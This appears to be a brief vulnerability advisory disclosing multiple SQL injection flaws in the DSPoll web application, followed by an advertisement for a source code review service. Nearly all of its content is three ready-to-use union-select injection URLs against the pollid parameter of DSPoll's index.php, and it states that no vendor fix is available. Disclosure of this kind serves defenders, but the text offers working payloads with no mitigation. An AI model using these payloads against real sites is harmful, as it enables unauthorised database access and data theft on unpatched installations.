PoC/Exploit for Multiple SQL Injection Vulnerabilities in DSPoll
Published Proof of Concept code - Multiple SQL Injection Vulnerabilities in DSPoll.
- Description
- Available
- Solution
- Not available - check vendor's website
SQL Injection Examples:
http://[host]/dspoll/index.php?open=pollresults&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
http://[host]/dspoll/index.php?open=topolls&pollid=9999'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29/*
http://[host]/dspoll/index.php?open=pollit&pollid=9999'%20union%20select%201,2/*
Order Source Code Review
Prevent hacker attacks by source code analysis of your website made by eVuln team.The work will be done by experts in web security.